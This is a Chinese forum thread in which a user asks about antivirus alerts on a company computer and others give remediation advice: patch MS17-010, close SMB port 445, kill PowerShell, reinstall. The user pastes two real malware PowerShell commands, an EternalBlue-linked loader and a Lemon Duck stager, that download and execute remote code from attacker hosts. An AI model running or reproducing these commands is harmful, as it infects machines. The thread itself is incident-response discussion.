公司电脑，火绒提示被攻击，这是啥情况

• 请不要在回答技术问题时复制粘贴 AI 生成的内容

This topic created in 2290 days ago, the information mentioned may be changed or developed.

操作进程：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

命令行：powershell -c "try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='1cd2db7421c0b88eb89eb6182bd6785e';$ifp=$env:tmp+'\if.bin';$down_url='http://207.154.225.82';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{$s+=$.ToString('X2')};return $s}if(test-path $ifp){$con=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient)."downloaddata"($down_url+'/if.bin?SZXHRZZLIT036&9CBD7D74-E8C3-6E51-230D-12457CECDB29&DC:4A:3E:76:02:A0');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}IEX(-join[char[]]$con)"

攻击方式：Exploit/EternalBlue

远程地址：10.83.3.33:445

防御结果：已阻止

37 replies • 2020-05-20 22:06:07 +08:00

BrettD

Feb 28, 2020 via iPhone

勒索软件的感觉

shadowyue

Feb 28, 2020

http://207.154.225.82
这个地址我还能访问，是个 nginx

crab

Feb 28, 2020

局域网没打那补丁？

phpinfos

Feb 28, 2020

永恒之蓝 445 端口关掉打补丁

shadowyue

Feb 28, 2020

@crab 啥补丁

shadowyue

Feb 28, 2020

@phpinfos 这个东西严重吗，要跟公司 IT 讲吗

phpinfos

Feb 28, 2020

@shadowyue
一般会跟勒索病毒绑在一起，小心为好，赶紧修复吧
补丁： https://technet.microsoft.com/zh-cn/library/security/MS17-010

Osk

Feb 28, 2020

看这样子怎么像 smb v1 的漏洞补丁没打？

Osk

Feb 28, 2020

不需要共享打印机和文件夹的话可以先在防火墙里面把本机的 445 等 smb service 端口关闭了，毕竟看样子你是在毒窝里面了🤣

shadowyue

Feb 28, 2020

淦哦，公司 win10 没法更新补丁

shadowyue

Feb 28, 2020

@Osk 毒窝吗,公司好多人正上班呢，跟 it 讲了没回我呢，还好火绒帮我挡住了

shadowyue

Feb 28, 2020

it 说自己杀毒就行，一直都有这个病毒🤣

Osk

Feb 28, 2020

@shadowyue 永恒之蓝在没打补丁或做防护措施的局域网中传播很快的。

win7, win8, win 10 <1703 （好像是这个版本）都会中招。很好奇 win 10 没法更新补丁是什么情况？
win10 打补丁比 win7 方便多了，只需要去下载最近的月度累计更新手动安装也很方便。

作为用户，不想打补丁就先把本机的 445、135、137、138、139 端口关闭了，除非你需要共享打印机或者文件给别人。毕竟万一火绒没拦住就惨了

Osk

Feb 28, 2020

另外，看你们内网的 ip 都是 10 的，看起来是大公司了，it 都这么水吗 /doge/

shadowyue

Feb 28, 2020

@Osk 公司好像没几个人用 win10,我更新一直都是提示失败了，不知道为啥。

我被攻击了 powershell 这个程序就疯狂跑吃 cpu，好奇别人没这个问题吗，电脑卡爆了应该有别人反馈才对。

公司是蛮大的，工作累了直接睡，没问题 🤣

Osk

Feb 28, 2020

公司上外网需要使用代理吗？

吃 cpu 而不搞你的文件的话，看起来像挖矿的程序，危害也。。。不大吧 /滑稽 /

shadowyue

Feb 28, 2020

@Osk 不用，但是禁止了一些娱乐网站，我自己挂代理可以浏览，哈哈
按你说的吧 445 端口关闭了，貌似已经没问题了，谢谢你

shadowyue

Feb 28, 2020

@Osk 大佬救救我，这又是啥

操作进程：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
命令行：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c "$Lemon_Duck='1EdJ95\kmSXYuMOLF1';$x='t.awc'+'na.com';;$y='http://'+$x+'/x.js';$z=$y+'p?ipc_20200228';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}"

风险分类：木马盗号

访问网址：t.awcna.com/x.js

操作结果：已阻止

Shazoo

Feb 28, 2020

下载 http://t.awcna.com/x.js ,如果程序的 md5=a49add2a8eeb7e89b9d743c0af0e1443，执行之。

https://x.threatbook.cn/nodev4/domain/awcna.com 看看细节呗。

Osk

Feb 28, 2020

@shadowyue 看来一开始火绒并没有拦住病毒。。。先把 powershell 进程结束了看是否再生，建议断网杀毒。必要的话重装了。

shadowyue

Feb 28, 2020

@Shazoo 这个 js 文件从浏览器访问不到

shadowyue

Feb 28, 2020

@Osk 杀了隔十几分钟会又出来，在杀毒了，试试

ThirdFlame

Feb 28, 2020

你的电脑已经被控制了。通过 powershell 执行恶意代码 ing

shadowyue

Feb 28, 2020

@ThirdFlame 怎么处理啊，大佬

WordTian

Feb 28, 2020 via Android

备份好重要文件，重装系统吧，联网前关掉 445 端口

juded

Feb 28, 2020

火绒行为管理不错，但查杀能力太差了。

vocaloid

Feb 28, 2020

把 powershell 进程先杀掉啊。。要不还会干更多的事情

ihacku

Feb 28, 2020 via iPhone

这个动作本身已经被拦截了
你没有打补丁，可以在火绒里面打下补丁重启生效
可以通知 IT 发下 10.83.3.33 这台机器中毒了杀毒打补丁
内网应该不止这一台被感染的

Osk

Feb 28, 2020

@shadowyue 那我还是建议重装了, 如果非要清理, 最好进入离线系统, 使用其它杀毒软件对 C 盘全盘扫描, 离线的原因是避免恶意程序对自身做隐藏或者干扰.

查杀完成后, 还需要在离线系统(干净的 PE 中)使用 autoruns 等工具对所有的驱动, 服务, 自启动等项目手工排查, 一些恶意程序隐藏的很好, 我觉得这一步是必须的.

最后问题来了: 都这么麻烦了, 还不如重装.

重装后: 先不要联网, 防火墙关闭 smb v1(445), rdp(3389) 等端口, 不然处在毒窝中分分钟死灰复燃. 不过, 使用最新的 Windows 10 1909 镜像也不要太紧张, 大部分局域网传播的严重漏洞已经封好了.